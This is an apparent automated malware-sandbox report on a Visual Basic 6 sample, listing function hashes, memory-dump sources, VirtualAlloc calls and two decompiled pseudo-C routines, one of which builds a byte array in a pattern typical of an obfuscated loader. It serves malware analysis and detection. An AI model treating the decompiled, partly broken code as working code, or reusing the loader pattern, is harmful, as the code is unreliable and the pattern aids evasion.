Instruction ID: ef11b96de6f3f6df1e6ab01573aae2735ca770885c4b176725cb8838fbde4505
Opcode Fuzzy Hash: 6797d261d9a3785c9cfb07018401ba6407394e3be4bdebc398f070012a2dfc92
Instruction Fuzzy Hash: 9E4189E2E7D60199C3067D21C0851B06E4CEAAB393331EE6B8067791F1763E0F4725CA

Uniqueness

Uniqueness Score: -1.00%

Function 0040322B, Relevance: 1.5, APIs: 1, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 57b67b38367a201f8ded9a11ebada0d625af55b29fd090d0e9459cd5482c47d3
Instruction ID: cf4676e2a8a1cb8ff04c9ccf13d5ad0ee4947ba38d9caa4f536d16fe4b45798d
Opcode Fuzzy Hash: 57b67b38367a201f8ded9a11ebada0d625af55b29fd090d0e9459cd5482c47d3
Instruction Fuzzy Hash: A341ACD2E2D64199C306BD21C0851B17E4DEA97363331DEAB8067761F1B63E0F4726C9

Uniqueness

Uniqueness Score: -1.00%

Function 00403381, Relevance: 1.4, APIs: 1, Instructions: 190memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 706f000d9ba3509bf9fd952a98c5d6a35cf759c8d0cc1b0d3496750aea0f553e
Instruction ID: d43b1338550c2c3099589404d5060e493fa72319ca3f5165eb5f48cbeb7b9de0
Opcode Fuzzy Hash: 706f000d9ba3509bf9fd952a98c5d6a35cf759c8d0cc1b0d3496750aea0f553e
Instruction Fuzzy Hash: 213168D2E396019DC306BD21C4851B46E89EA973A3331DD6B8067BA1F1B63E0F4729C9

Uniqueness

Uniqueness Score: -1.00%

Function 004032E0, Relevance: 1.4, APIs: 1, Instructions: 180memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 47f3cd74a056394d306de50e06b0806ee77f7b8ce62ba913b3d916565270881f
Instruction ID: 32f34223a6f71c28f0a0d951d2de6ee342d056674c32c91e86db0c12370641ef
Opcode Fuzzy Hash: 47f3cd74a056394d306de50e06b0806ee77f7b8ce62ba913b3d916565270881f
Instruction Fuzzy Hash: CB3168D2E3964199C306BD21C4851B06E8CEA973A3331EE6B8067BA1F1763E0F4725C9

Uniqueness

Uniqueness Score: -1.00%

Function 004031DB, Relevance: 1.4, APIs: 1, Instructions: 177memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000), ref: 004033C1

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2044214e94dba791c26bd903e4fd05aba128d722ca02693aabd28f057cc1fb80
Instruction ID: f572382566b5009a61c7a78b427243a209d04ceb4636e48509b721b734ed5284
Opcode Fuzzy Hash: 2044214e94dba791c26bd903e4fd05aba128d722ca02693aabd28f057cc1fb80
Instruction Fuzzy Hash: F04169D2E7D60199D3176D21C4851B06E8CEAA7363331EE6B80677A1F17A3E0F4725C9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401614, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727

Uniqueness

Uniqueness Score: -1.00%

Function 021C55FD, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.318419158.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f3a09bdbb1b3a21822fa4316cbbcf6732e4ca887d041004e7158dbea0a2544
Instruction ID: 7f3d7e2ee8f823a0e6586e59a3fed3e137c7d0028bb315a53a8e745b47987ab2
Opcode Fuzzy Hash: 41f3a09bdbb1b3a21822fa4316cbbcf6732e4ca887d041004e7158dbea0a2544
Instruction Fuzzy Hash: 8B1172F3BB24109FE7865939A8E76C577B1DE6560679989A6C088140176230222F6D70

Uniqueness

Uniqueness Score: -1.00%

Function 00401850, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727

Uniqueness

Uniqueness Score: -1.00%

Function 00401803, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBC2, Relevance: 97.9, APIs: 65, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040DBC2(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				intOrPtr _v56;
				char _v68;
				char _v76;
				signed int _v80;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				char _t226;
				char* _t228;
				void* _t325;
				void* _t327;
				intOrPtr _t328;

				_t328 = _t327 - 0xc;
				 *[fs:0x0] = _t328;
				L004012A0();
				_v16 = _t328;
				_v12 = 0x4011d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t325);
				L00401420();
				L004013E4();
				_push(0x11);
				_push(0x40b108);
				_t226 =  &_v68;
				_push(_t226);
				L004013A2();
				_v80 = _v80 & 0x00000000;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v92 = _t226;
				} else {
					_v92 = _v92 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 1;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v96 = _t226;
				} else {
					_v96 = _v96 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 2;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v100 = _t226;
				} else {
					_v100 = _v100 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 3;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v104 = _t226;
				} else {
					_v104 = _v104 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 4;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v108 = _t226;
				} else {
					_v108 = _v108 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 5;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v112 = _t226;
				} else {
					_v112 = _v112 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 6;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v116 = _t226;
				} else {
					_v116 = _v116 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 7;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v120 = _t226;
				} else {
					_v120 = _v120 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 8;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v124 = _t226;
				} else {
					_v124 = _v124 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 9;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v128 = _t226;
				} else {
					_v128 = _v128 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xa;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v132 = _t226;
				} else {
					_v132 = _v132 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xb;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v136 = _t226;
				} else {
					_v136 = _v136 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xc;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v140 = _t226;
				} else {
					_v140 = _v140 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xd;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v144 = _t226;
				} else {
					_v144 = _v144 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xe;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v148 = _t226;
				} else {
					_v148 = _v148 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0xf;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v152 = _t226;
				} else {
					_v152 = _v152 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x10;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v156 = _t226;
				} else {
					_v156 = _v156 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x11;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v160 = _t226;
				} else {
					_v160 = _v160 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x12;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v164 = _t226;
				} else {
					_v164 = _v164 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x13;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v168 = _t226;
				} else {
					_v168 = _v168 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x14;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v172 = _t226;
				} else {
					_v172 = _v172 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x15;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v176 = _t226;
				} else {
					_v176 = _v176 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x16;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v180 = _t226;
				} else {
					_v180 = _v180 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x17;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v184 = _t226;
				} else {
					_v184 = _v184 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x18;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v188 = _t226;
				} else {
					_v188 = _v188 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x19;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v192 = _t226;
				} else {
					_v192 = _v192 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1a;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v196 = _t226;
				} else {
					_v196 = _v196 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1b;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v200 = _t226;
				} else {
					_v200 = _v200 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_v80 = 0x1c;
				if(_v80 >= 0x1d) {
					L0040139C();
					_v204 = _t226;
				} else {
					_v204 = _v204 & 0x00000000;
				}
				L00401396();
				 *((char*)(_v56 + _v80)) = _t226;
				_push(E0040E1B6);
				L00401450();
				L00401462();
				_v76 =  &_v68;
				_t228 =  &_v76;
				_push(_t228);
				_push(0);
				L00401390();
				return _t228;
			}

0x0040dbc5
0x0040dbd4
0x0040dbe0
0x0040dbe8
0x0040dbeb
0x0040dbf2
0x0040dc01
0x0040dc0a
0x0040dc15
0x0040dc1a
0x0040dc1c
0x0040dc21
0x0040dc24
0x0040dc25
0x0040dc2a
0x0040dc32
0x0040dc3a
0x0040dc3f
0x0040dc34
0x0040dc34
0x0040dc34
0x0040dc46
0x0040dc51
0x0040dc53
0x0040dc5e
0x0040dc66
0x0040dc6b
0x0040dc60
0x0040dc60
0x0040dc60
0x0040dc72
0x0040dc7d
0x0040dc7f
0x0040dc8a
0x0040dc92
0x0040dc97
0x0040dc8c
0x0040dc8c
0x0040dc8c
0x0040dc9e
0x0040dca9
0x0040dcab
0x0040dcb6
0x0040dcbe
0x0040dcc3
0x0040dcb8
0x0040dcb8
0x0040dcb8
0x0040dcca
0x0040dcd5
0x0040dcd7
0x0040dce2
0x0040dcea
0x0040dcef
0x0040dce4
0x0040dce4
0x0040dce4
0x0040dcf6
0x0040dd01
0x0040dd03
0x0040dd0e
0x0040dd16
0x0040dd1b
0x0040dd10
0x0040dd10
0x0040dd10
0x0040dd22
0x0040dd2d
0x0040dd2f
0x0040dd3a
0x0040dd42
0x0040dd47
0x0040dd3c
0x0040dd3c
0x0040dd3c
0x0040dd4e
0x0040dd59
0x0040dd5b
0x0040dd66
0x0040dd6e
0x0040dd73
0x0040dd68
0x0040dd68
0x0040dd68
0x0040dd7a
0x0040dd85
0x0040dd87
0x0040dd92
0x0040dd9a
0x0040dd9f
0x0040dd94
0x0040dd94
0x0040dd94
0x0040dda6
0x0040ddb1
0x0040ddb3
0x0040ddbe
0x0040ddc6
0x0040ddcb
0x0040ddc0
0x0040ddc0
0x0040ddc0
0x0040ddd2
0x0040dddd
0x0040dddf
0x0040ddea
0x0040ddf2
0x0040ddf7
0x0040ddec
0x0040ddec
0x0040ddec
0x0040ddfe
0x0040de09
0x0040de0b
0x0040de16
0x0040de21
0x0040de26
0x0040de18
0x0040de18
0x0040de18
0x0040de30
0x0040de3b
0x0040de3d
0x0040de48
0x0040de53
0x0040de58
0x0040de4a
0x0040de4a
0x0040de4a
0x0040de62
0x0040de6d
0x0040de6f
0x0040de7a
0x0040de85
0x0040de8a
0x0040de7c
0x0040de7c
0x0040de7c
0x0040de94
0x0040de9f
0x0040dea1
0x0040deac
0x0040deb7
0x0040debc
0x0040deae
0x0040deae
0x0040deae
0x0040dec6
0x0040ded1
0x0040ded3
0x0040dede
0x0040dee9
0x0040deee
0x0040dee0
0x0040dee0
0x0040dee0
0x0040def8
0x0040df03
0x0040df05
0x0040df10
0x0040df1b
0x0040df20
0x0040df12
0x0040df12
0x0040df12
0x0040df2a
0x0040df35
0x0040df37
0x0040df42
0x0040df4d
0x0040df52
0x0040df44
0x0040df44
0x0040df44
0x0040df5c
0x0040df67
0x0040df69
0x0040df74
0x0040df7f
0x0040df84
0x0040df76
0x0040df76
0x0040df76
0x0040df8e
0x0040df99
0x0040df9b
0x0040dfa6
0x0040dfb1
0x0040dfb6
0x0040dfa8
0x0040dfa8
0x0040dfa8
0x0040dfc0
0x0040dfcb
0x0040dfcd
0x0040dfd8
0x0040dfe3
0x0040dfe8
0x0040dfda
0x0040dfda
0x0040dfda
0x0040dff2
0x0040dffd
0x0040dfff
0x0040e00a
0x0040e015
0x0040e01a
0x0040e00c
0x0040e00c
0x0040e00c
0x0040e024
0x0040e02f
0x0040e031
0x0040e03c
0x0040e047
0x0040e04c
0x0040e03e
0x0040e03e
0x0040e03e
0x0040e056
0x0040e061
0x0040e063
0x0040e06e
0x0040e079
0x0040e07e
0x0040e070
0x0040e070
0x0040e070
0x0040e088
0x0040e093
0x0040e095
0x0040e0a0
0x0040e0ab
0x0040e0b0
0x0040e0a2
0x0040e0a2
0x0040e0a2
0x0040e0ba
0x0040e0c5
0x0040e0c7
0x0040e0d2
0x0040e0dd
0x0040e0e2
0x0040e0d4
0x0040e0d4
0x0040e0d4
0x0040e0ec
0x0040e0f7
0x0040e0f9
0x0040e104
0x0040e10f
0x0040e114
0x0040e106
0x0040e106
0x0040e106
0x0040e11e
0x0040e129
0x0040e12b
0x0040e136
0x0040e141
0x0040e146
0x0040e138
0x0040e138
0x0040e138
0x0040e150
0x0040e15b
0x0040e15d
0x0040e168
0x0040e173
0x0040e178
0x0040e16a
0x0040e16a
0x0040e16a
0x0040e182
0x0040e18d
0x0040e18f
0x0040e197
0x0040e19f
0x0040e1a7
0x0040e1aa
0x0040e1ad
0x0040e1ae
0x0040e1b0
0x0040e1b5

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040DBE0
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040DC0A
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040DC15
__vbaAryConstruct2.MSVBVM60(?,0040B108,00000011,?,?,?,?,004012A6), ref: 0040DC25
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DC3A
__vbaUI1I2.MSVBVM60 ref: 0040DC46
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DC66
__vbaUI1I2.MSVBVM60 ref: 0040DC72
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DC92
__vbaUI1I2.MSVBVM60 ref: 0040DC9E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DCBE
__vbaUI1I2.MSVBVM60 ref: 0040DCCA
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DCEA
__vbaUI1I2.MSVBVM60 ref: 0040DCF6
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD16
__vbaUI1I2.MSVBVM60 ref: 0040DD22
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD42
__vbaUI1I2.MSVBVM60 ref: 0040DD4E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD6E
__vbaUI1I2.MSVBVM60 ref: 0040DD7A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DD9A
__vbaUI1I2.MSVBVM60 ref: 0040DDA6
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DDC6
__vbaUI1I2.MSVBVM60 ref: 0040DDD2
__vbaUI1I2.MSVBVM60 ref: 0040DDFE
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE21
__vbaUI1I2.MSVBVM60 ref: 0040DE30
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE53
__vbaUI1I2.MSVBVM60 ref: 0040DE62
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE85
__vbaUI1I2.MSVBVM60 ref: 0040DE94
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DEB7
__vbaUI1I2.MSVBVM60 ref: 0040DEC6
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DEE9
__vbaUI1I2.MSVBVM60 ref: 0040DEF8
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF1B
__vbaUI1I2.MSVBVM60 ref: 0040DF2A
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF4D
__vbaUI1I2.MSVBVM60 ref: 0040DF5C
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DF7F
__vbaUI1I2.MSVBVM60 ref: 0040DF8E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DFB1
__vbaUI1I2.MSVBVM60 ref: 0040DFC0
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DFE3
__vbaUI1I2.MSVBVM60 ref: 0040DFF2
__vbaUI1I2.MSVBVM60 ref: 0040E024
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E047
__vbaUI1I2.MSVBVM60 ref: 0040E056
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E079
__vbaUI1I2.MSVBVM60 ref: 0040E088
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E0AB
__vbaUI1I2.MSVBVM60 ref: 0040E0BA
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E0DD
__vbaUI1I2.MSVBVM60 ref: 0040E0EC
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E10F
__vbaUI1I2.MSVBVM60 ref: 0040E11E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E141
__vbaUI1I2.MSVBVM60 ref: 0040E150
__vbaGenerateBoundsError.MSVBVM60 ref: 0040E173
__vbaUI1I2.MSVBVM60 ref: 0040E182
__vbaFreeVar.MSVBVM60(0040E1B6), ref: 0040E197
__vbaFreeStr.MSVBVM60(0040E1B6), ref: 0040E19F
__vbaAryDestruct.MSVBVM60(00000000,?,0040E1B6), ref: 0040E1B0

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$Free$ChkstkConstruct2CopyDestruct
String ID:
API String ID: 1600147872-0
Opcode ID: 2ddff8eeddb6fc00b6a6fbef5cb7f949e2b7df239e79d1ee77c7b36a7c5b0ea8
Instruction ID: 4903388bb89a91c1b173f37a7e43e7f3e7b6b7ae6537e3700a4ed541a33ac917
Opcode Fuzzy Hash: 2ddff8eeddb6fc00b6a6fbef5cb7f949e2b7df239e79d1ee77c7b36a7c5b0ea8
Instruction Fuzzy Hash: A502A074C06208CFEB20EFA6C5517ACBBB1AF15309F1484AFD416BA692C778054ACF1B

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAB4, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 343
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040BAB4(void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, signed int _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char* _v32;
				char* _v36;
				void* _v40;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				short _v104;
				char _v112;
				char _v128;
				char _v144;
				char* _v152;
				char _v160;
				intOrPtr _v200;
				char _v208;
				char* _v212;
				short _v216;
				char* _v220;
				signed int _v224;
				signed int _v228;
				intOrPtr _v236;
				char* _v240;
				intOrPtr _v252;
				void* _v260;
				char* _t159;
				char* _t161;
				void* _t162;
				char* _t163;
				char* _t166;
				char* _t169;
				signed short _t178;
				char* _t190;
				intOrPtr _t191;
				signed int _t193;
				short _t204;
				char* _t209;
				intOrPtr _t216;
				void* _t219;
				void* _t222;
				void* _t227;
				void* _t228;
				char* _t232;
				intOrPtr* _t246;
				void* _t256;
				void* _t259;
				intOrPtr _t261;
				void* _t262;
				intOrPtr _t264;
				intOrPtr _t265;
				intOrPtr _t266;
				void* _t267;
				intOrPtr* _t268;
				void* _t270;

				_t259 = __esi;
				_t256 = __edi;
				_t246 = __edx;
				_t228 = __ecx;
				_t227 = __ebx;
				_t261 = _t264;
				_t265 = _t264 - 0xc;
				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t265;
				 *0 = _t265;
				_t270 = 0xd8 + __ecx;
				_t266 = _t261;
				_pop(_t262);
				_push(__edi);
				asm("invalid");
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = _t266;
				_v12 = 0x401150;
				asm("adc [eax], eax");
				_v8 = 0;
				_t159 =  *_a4;
				_push(_a4);
				if(_t270 == 0) {
					 *((intOrPtr*)(_t159 + 4))();
					_t159 =  &_v28;
					_push(_t159);
					_push(0x2003f);
				}
				asm("aas");
				 *_t246 =  *_t246 + _t159;
				 *_t246 =  *_t246 + _t228;
				_push( *_a12);
				_t161 =  &_v60;
				_push(_t161);
				L00401474();
				_push(_t161);
				_t162 = _a8;
				_push( *_t162);
				E0040AEE8();
				_v212 = _t162;
				L0040146E();
				_push(_v60);
				_push(_a12);
				L00401468();
				_t163 = _v212;
				_v36 = _t163;
				L00401462();
				if(_v36 == 0) {
					_v72 = _v72 & 0x00000000;
					_v80 = 2;
					_push( &_v80);
					_push(0x400);
					L00401456();
					L0040145C();
					L00401450();
					_v56 = 0x400;
					_push( &_v56);
					_push(_v52);
					_t166 =  &_v64;
					_push(_t166);
					L00401474();
					_push(_t166);
					_push( &_v40);
					_push(0);
					_push( *_a16);
					_t169 =  &_v60;
					_push(_t169);
					L00401474();
					_push(_t169);
					_push(_v28);
					E0040AF58();
					_v212 = _t169;
					L0040146E();
					_push(_v60);
					_push(_a16);
					L00401468();
					_push(_v64);
					_push( &_v52);
					L00401468();
					_v36 = _v212;
					_push( &_v64);
					_t163 =  &_v60;
					_push(_t163);
					_push(2);
					L0040144A();
					_t267 = _t266 + 0xc;
					if(_v36 == 0) {
						_v72 = 1;
						_v80 = 2;
						_v152 =  &_v52;
						_v160 = 0x4008;
						_push( &_v80);
						_push(_v56);
						_push( &_v160);
						_push( &_v96);
						L00401438();
						_push( &_v96);
						_t178 =  &_v60;
						_push(_t178);
						L0040143E();
						_push(_t178);
						L00401444();
						asm("sbb eax, eax");
						_v216 =  ~( ~_t178 + 1);
						_t232 =  &_v60;
						L00401462();
						_push( &_v96);
						_push( &_v80);
						_push(2);
						L00401432();
						_t268 = _t267 + 0xc;
						if(_v216 == 0) {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_push(_v56);
							_push( &_v160);
							_push( &_v80);
							L00401426();
							_push( &_v80);
							L0040142C();
							L0040145C();
							L00401450();
							goto L16;
						} else {
							_v152 =  &_v52;
							_v160 = 0x4008;
							_t222 = _v56 - 1;
							if(_t222 < 0) {
								L30:
								L004013FC();
								 *[fs:0x0] = _t268;
								L004012A0();
